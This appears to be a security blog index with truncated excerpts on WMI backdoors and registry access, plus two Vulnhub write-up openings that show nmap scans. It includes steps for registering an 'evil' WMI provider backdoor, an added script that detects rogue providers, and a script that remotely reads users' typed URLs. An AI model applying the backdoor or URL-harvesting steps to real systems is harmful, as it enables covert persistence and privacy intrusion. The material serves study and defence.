Powershell * WMI

Backdoor with WMI

Win32 localadmins provider, one of the earlier proof-of-concept evil WMI providers: https://github.com/rzander/localadmins

Evil Network Connection WMI Provider: https://github.com/jaredcatkinson/EvilNetConnectionWMIProvider

Open a command prompt with admin rights in the build output directory (C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug) and register the provider DLL with InstallUtil:

C:\Users\victim6\Downloads\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider-master\EvilNetConnectionWMIProvider\bin\Debug>InstallUtil.exe EvilNetConnectionWMIProvider.dll

In another PowerShell session, list the Win32_Net* classes; win32_netconnection now appears in the output, and its RunPS method can be invoked:

PS C:\Users\victim6\Downloads> Get-WmiObject -class win32_net* -list
PS C:\Users\victim6\Downloads> Invoke-WmiMethod -class win32_netconnection -name RunPS -ArgumentList…
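A provider registered this way survives in the WMI repository like any other, so the defensive counterpart is an inventory of what providers exist and which DLL or assembly backs each one. The script below is an added example and not code from the original post or from the EvilNetConnectionWMIProvider project. It walks the __Win32Provider instances in a few namespaces (the namespace list is my choice), resolves each CLSID to its COM server through HKCR\CLSID\<clsid>\InprocServer32, collects the registration kinds (Class, Instance, Method, Event) that point at the provider, and flags providers whose server sits outside %SystemRoot%\System32 or is a CLR-hosted class (mscoree.dll with an Assembly value in the same key). The "Suspicious" flag is a heuristic of mine for triage, not a verdict.

```powershell
# Added example (not from the original post): inventory WMI providers so a newly
# installed one stands out. Namespace list and the path heuristic are assumptions.
function Get-WmiProviderInventory {
    param([string[]]$Namespace = @('root\cimv2', 'root\default', 'root\subscription'))

    foreach ($ns in $Namespace) {
        # Every __*ProviderRegistration instance derives from __ProviderRegistration,
        # so one query returns class/instance/method/event registrations together.
        $registrations = Get-WmiObject -Namespace $ns -Class __ProviderRegistration -ErrorAction SilentlyContinue

        foreach ($p in Get-WmiObject -Namespace $ns -Class __Win32Provider -ErrorAction SilentlyContinue) {
            # Resolve the COM server behind the provider's CLSID. For a COM-registered
            # .NET class the server is mscoree.dll and the managed assembly is named
            # in the Assembly/CodeBase values of the same key.
            $clsidKey = "Registry::HKEY_CLASSES_ROOT\CLSID\$($p.CLSID)\InprocServer32"
            $server = $assembly = $codeBase = $null
            if ($p.CLSID -and (Test-Path $clsidKey)) {
                $props    = Get-ItemProperty $clsidKey
                $server   = $props.'(default)'
                $assembly = $props.Assembly
                $codeBase = $props.CodeBase
            }

            # The Provider property of a registration is a reference such as
            # __Win32Provider.Name="CIMWin32"; match on the quoted provider name.
            $kinds = $registrations |
                Where-Object { $_.Provider -match "Name=`"$([regex]::Escape($p.Name))`"" } |
                ForEach-Object { $_.__CLASS -replace '^__|ProviderRegistration$', '' }

            [pscustomobject]@{
                Namespace    = $ns
                Provider     = $p.Name
                HostingModel = $p.HostingModel
                Kinds        = (($kinds | Sort-Object -Unique) -join ',')
                Server       = $server
                Assembly     = $assembly
                CodeBase     = $codeBase
                # Heuristic: a server outside System32, or a CLR-hosted provider, deserves a look.
                Suspicious   = (($server -and ($server -notlike "$env:SystemRoot\System32\*")) -or [bool]$assembly)
            }
        }
    }
}

# Usage: show only the providers the heuristic flags, then review Server/Assembly/CodeBase by hand.
Get-WmiProviderInventory | Where-Object Suspicious | Format-Table -AutoSize
```

Run it elevated so the registry lookups and the root\subscription namespace are readable. Add namespaces to the list for a fuller sweep, and remember that 32-bit providers on a 64-bit host register their CLSID under Wow6432Node, which this pass does not walk.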

Vulnerable Machine Writeup * VULNHUB

HA AVENGERS ARSENAL (VULNHUB)

root@kali:~/Downloads# nmap -A 192.168.48.133
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-16 09:39 GMT
Nmap scan report for 192.168.48.133
Host is up (0.00029s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-git:
|   192.168.48.133:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this…

Powershell * WMI

Windows Registry with WMI

The StdRegProv class in root\default exposes the registry over WMI. List the class and its methods:

PS C:\> Get-WmiObject -Namespace root\default -Class stdregprov -list
PS C:\> Get-WmiObject -Namespace root\default -Class stdregprov -list | select -ExpandProperty methods
PS C:\> $regprov = Get-WmiObject -Namespace root\default -Class stdregprov -list
PS C:\> $regprov.methods

Retrieving Internet Explorer Typed URLs (the first argument, 2147483649, is the hDefKey value for HKEY_CURRENT_USER, 0x80000001):

PS C:\> Invoke-WmiMethod -namespace root\default -class stdregprov -name Enumkey @(2147483649,"software\microsoft\internet explorer") | select -ExpandProperty snames
PS C:\>…
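Enumerating the subkey only shows that TypedURLs exists; reading the URLs themselves takes EnumValues followed by GetStringValue for each value name. The function below is an added example, not code from the original post. It wraps those two StdRegProv calls, works against a remote host through -ComputerName, and takes an optional SID so the key can be read under HKEY_USERS for a user other than the one running the query (over WMI, HKEY_CURRENT_USER is the hive of the calling account, not of whoever is logged on). The function name and parameter names are my own.

```powershell
# Added example (not from the original post): read IE TypedURLs through StdRegProv.
# hDefKey constants are the documented StdRegProv hive values.
$HKEY_CURRENT_USER = [uint32]2147483649   # 0x80000001
$HKEY_USERS        = [uint32]2147483651   # 0x80000003

function Get-TypedUrlsViaWmi {
    param(
        [string]$ComputerName = '.',
        # Optional SID; when given, the key is read under HKU\<SID> instead of HKCU.
        # Only hives of loaded profiles are present under HKU.
        [string]$UserSid
    )

    if ($UserSid) {
        $hive   = $HKEY_USERS
        $subKey = "$UserSid\Software\Microsoft\Internet Explorer\TypedURLs"
    } else {
        $hive   = $HKEY_CURRENT_USER
        $subKey = 'Software\Microsoft\Internet Explorer\TypedURLs'
    }

    $common = @{ Namespace = 'root\default'; Class = 'StdRegProv'; ComputerName = $ComputerName }

    # EnumValues(hDefKey, sSubKeyName) -> sNames, Types, ReturnValue (0 = success, 2 = key not found)
    $enum = Invoke-WmiMethod @common -Name EnumValues -ArgumentList $hive, $subKey
    if ($enum.ReturnValue -ne 0) {
        Write-Warning "EnumValues on $subKey returned $($enum.ReturnValue) (2 = key not found)"
        return
    }

    foreach ($name in $enum.sNames) {
        # GetStringValue(hDefKey, sSubKeyName, sValueName) -> sValue, ReturnValue
        $val = Invoke-WmiMethod @common -Name GetStringValue -ArgumentList $hive, $subKey, $name
        [pscustomobject]@{
            Computer  = $ComputerName
            ValueName = $name     # url1, url2, ... in the order IE wrote them
            Url       = $val.sValue
        }
    }
}

# Usage: current user's hive on the local machine.
Get-TypedUrlsViaWmi
# Another user on a remote host, by SID:
# Get-TypedUrlsViaWmi -ComputerName 'workstation1' -UserSid 'S-1-5-21-...'
```

For EnumKey, EnumValues and GetStringValue the positional -ArgumentList order matches the documented parameter order. That is not guaranteed for every StdRegProv method: Invoke-WmiMethod orders -ArgumentList by parameter name, so for SetStringValue (hDefKey, sSubKeyName, sValueName, sValue) the sValue argument must come before sValueName, or the method should be called directly on a [wmiclass]'root\default:StdRegProv' object, which takes arguments in the declared order.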

Vulnerable Machine Writeup * VULNHUB

HA RUDRA (VULNHUB)

root@kali:~# nmap -A 192.168.48.132
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 17:48 GMT
Nmap scan report for 192.168.48.132
Host is up (0.00038s latency).
Not shown: 996 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 d7:0d:45:dd:52:69:f9:54:2a:73:a7:d0:c5:ab:db:9b (RSA)
|   256 7f:cc:3c:a5:53:47:05:15:94:95:41:ea:5e:48:f1:00 (ECDSA)
|_…